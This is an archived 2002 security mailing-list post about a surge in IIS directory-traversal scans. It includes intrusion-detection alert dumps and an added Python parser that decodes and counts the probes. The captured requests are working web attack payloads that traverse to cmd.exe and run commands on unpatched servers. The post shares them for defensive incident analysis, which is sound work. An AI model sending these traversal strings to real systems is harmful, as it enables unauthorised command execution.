Increased IIS scans mainly on 66.0.0.0/8

From: Richard Gilman (Richard.Gilmanat_private)
Date: Wed Aug 14 2002 - 09:22:49 PDT


    Has anyone noticed an increase in scans trying old IIS redirect exploits? It doesn't appear to be Code Red or Nimda IMHO, just various attempts to redirect and run cmd.exe?dir. In the last month we have noticed a large increase in this activity, 94% of which originates from the 66.0.0.0/8 block (448 sources and only 31 not from 66/8). There are 4 sources originating from fuse.net that are particularly heavy hitters: 33,000 hits out of a total of 47,000. I am only seeing it on our 66.0.0.0/8 network so far. Looks like a new worm possibly, or 448 kiddie clones? The sources all seem to use the same set of cmd.exe attempts as in the obfuscated logs below.
     
    #(5 - 53409) [2002-07-17 10:40:25]  WEB-IIS cmd.exe access
    IPv4: 66.y.y.35 -> 66.x.x.43
    hlen=5 TOS=0 dlen=136 ID=45497 flags=0 offset=0 TTL=112 chksum=11558
    TCP:  port=1815 -> dport: 80  flags=***AP*** seq=2441649372
    ack=441678925 off=5 res=0 win=16560 urp=0 chksum=12602
    Payload:  length = 94
     
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
    010 : 32 66 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   2f../winnt/syste
    020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
    030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48   ir r HTTP/1.0..H
    040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65   ost: www..Connne
    050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A         ction: close..
    ------------------------------------------------------------------------------
     
    #(5 - 53408) [2002-07-17 10:40:25]  WEB-IIS cmd.exe access
    IPv4: 66.y.y.35 -> 66.x.x.43
    hlen=5 TOS=0 dlen=140 ID=45378 flags=0 offset=0 TTL=112 chksum=11673
    TCP:  port=1626 -> dport: 80  flags=***AP*** seq=2431763146
    ack=975791510 off=5 res=0 win=16560 urp=0 chksum=42327
    Payload:  length = 94
     
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
    010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   5c../winnt/syste
    020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
    030 : 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31 2E   ir c+dir HTTP/1.
    040 : 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F   0..Host: www..Co
    050 : 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F         nnnection: clo
    ------------------------------------------------------------------------------
     
    #(5 - 53407) [2002-07-17 10:40:21]  WEB-IIS cmd.exe access
    IPv4: 66.y.y.35 -> 66.x.x.43
    hlen=5 TOS=0 dlen=136 ID=44586 flags=0 offset=0 TTL=112 chksum=12469
    TCP:  port=1429 -> dport: 80  flags=***AP*** seq=2421845072
    ack=4293161072 off=5 res=0 win=16560 urp=0 chksum=38086
    Payload:  length = 94
     
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
    010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   5c../winnt/syste
    020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
    030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48   ir r HTTP/1.0..H
    040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65   ost: www..Connne
    050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A         ction: close..
    ------------------------------------------------------------------------------
     
    #(5 - 53406) [2002-07-17 10:40:19]  WEB-IIS cmd.exe access
    IPv4: 66.y.y.35 -> 66.x.x.43
    hlen=5 TOS=0 dlen=120 ID=44322 flags=0 offset=0 TTL=112 chksum=12749
    TCP:  port=3898 -> dport: 80  flags=***AP**F seq=2161495310
    ack=1433176482 off=5 res=0 win=16560 urp=0 chksum=62138
    Payload:  length = 80
     
    000 : 47 45 54 20 2F 64 2F 77 69 6E 6E 74 2F 73 79 73   GET /d/winnt/sys
    010 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63   tem32/cmd.exe?/c
    020 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48   +dir HTTP/1.0..H
    030 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65   ost: www..Connne
    040 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A   ction: close....
    ------------------------------------------------------------------------------
     
    #(5 - 53405) [2002-07-17 10:40:17]  WEB-IIS cmd.exe access
    IPv4: 66.y.y.35 -> 66.x.x.43
    hlen=5 TOS=0 dlen=138 ID=43768 flags=0 offset=0 TTL=112 chksum=13285
    TCP:  port=1395 -> dport: 80  flags=***AP*** seq=2420235203
    ack=934140878 off=5 res=0 win=16560 urp=0 chksum=19568
    Payload:  length = 94
     
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
    010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   5c../winnt/syste
    020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
    030 : 69 72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D   ir dir HTTP/1.0.
    040 : 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E   .Host: www..Conn
    050 : 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65         nection: close
    ------------------------------------------------------------------------------
     
    #(5 - 53404) [2002-07-17 10:40:16]  WEB-IIS cmd.exe access
    IPv4: 66.y.y.35 -> 66.x.x.43
    hlen=5 TOS=0 dlen=137 ID=43638 flags=0 offset=0 TTL=112 chksum=13416
    TCP:  port=1366 -> dport: 80  flags=***AP*** seq=2418722397
    ack=4180274008 off=5 res=0 win=16560 urp=0 chksum=17941
    Payload:  length = 93
     
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
    010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
    020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
    030 : 72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A   r dir HTTP/1.0..
    040 : 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E   Host: www..Connn
    050 : 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65            ection: close
    ------------------------------------------------------------------------------
     
    #(5 - 53403) [2002-07-17 10:40:16]  WEB-IIS cmd.exe access
    IPv4: 66.y.y.35 -> 66.x.x.43
    hlen=5 TOS=0 dlen=137 ID=43512 flags=0 offset=0 TTL=112 chksum=13542
    TCP:  port=1162 -> dport: 80  flags=***AP*** seq=2408265220
    ack=4037057826 off=5 res=0 win=16560 urp=0 chksum=11122
    Payload:  length = 93
     
    000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
    010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
    020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
    030 : 72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A   r dir HTTP/1.0..
    040 : 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E   Host: www..Connn
    050 : 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65            ection: close
     
    Rich
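As an added example (not part of Rich's post or of any list tooling), a small Python parser for alert dumps in the format shown above: it reassembles each hex payload, normalises the percent-encoded traversal in the request target, and tallies cmd.exe probes per source the way the post counts its sources. The sample alerts are copied from the post with the obfuscated addresses kept; the header and hex-line layouts are assumed to match what is shown above.

```python
import re
from urllib.parse import unquote, unquote_plus
# Constructed sample: two of the posted alerts, IP/TCP header lines and trailing payload trimmed.
SAMPLE = """\
#(5 - 53409) [2002-07-17 10:40:25]  WEB-IIS cmd.exe access
IPv4: 66.y.y.35 -> 66.x.x.43
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 32 66 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   2f../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48   ir r HTTP/1.0..H
040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65   ost: www..Connne
#(5 - 53406) [2002-07-17 10:40:19]  WEB-IIS cmd.exe access
IPv4: 66.y.y.35 -> 66.x.x.43
000 : 47 45 54 20 2F 64 2F 77 69 6E 6E 74 2F 73 79 73   GET /d/winnt/sys
010 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63   tem32/cmd.exe?/c
020 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48   +dir HTTP/1.0..H
030 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65   ost: www..Connne
"""
HEADER = re.compile(r"^#\(\d+ - (\d+)\) \[([^\]]+)\]\s+(.*)$")
ADDR = re.compile(r"^IPv4: (\S+) -> (\S+)$")
HEXLINE = re.compile(r"^[0-9A-Fa-f]{3} : ((?:[0-9A-Fa-f]{2} )*[0-9A-Fa-f]{2})(?:\s{2,}|\s*$)")
def parse_alerts(text):
    """One dict per alert (id, time, sig, src, dst, payload bytes) from an ACID-style dump."""
    alerts = []
    for line in (raw.strip() for raw in text.splitlines()):
        if m := HEADER.match(line):
            alerts.append({"id": m[1], "time": m[2], "sig": m[3], "payload": b""})
        elif m := ADDR.match(line):
            alerts[-1]["src"], alerts[-1]["dst"] = m[1], m[2]
        elif m := HEXLINE.match(line):
            alerts[-1]["payload"] += bytes.fromhex(m[1])  # fromhex ignores the spaces
    return alerts
def classify(payload):
    """Decode the request line: is it cmd.exe, via which traversal encoding, running what?"""
    request = payload.split(b"\r\n", 1)[0].decode("latin-1")
    target = " ".join(request.split(" ")[1:-1])  # keeps spaces inside the target ("dir r")
    path, _, query = target.partition("?")
    decoded = unquote(path).replace("\\", "/")   # %2f/%5c become '/'; invalid '%c.' is kept
    return {"cmd_exe": decoded.lower().endswith("/cmd.exe"),
            "traversal": ".." in decoded,
            "encodings": sorted({m.lower() for m in re.findall(r"%[0-9A-Fa-f]{2}", path)}),
            "command": unquote_plus(query)}
def per_source(text):
    """Tally cmd.exe probes per source address, the way the post counts its sources."""
    counts = {}
    for alert in parse_alerts(text):
        if classify(alert["payload"])["cmd_exe"]:
            counts[alert["src"]] = counts.get(alert["src"], 0) + 1
    return counts
```

Feeding the full dump from the post through `per_source` reproduces the per-address tally; the `encodings` field separates the `%2f`, `%5c` and malformed `%c` variants seen in the logs.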
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Wed Aug 14 2002 - 12:47:13 PDT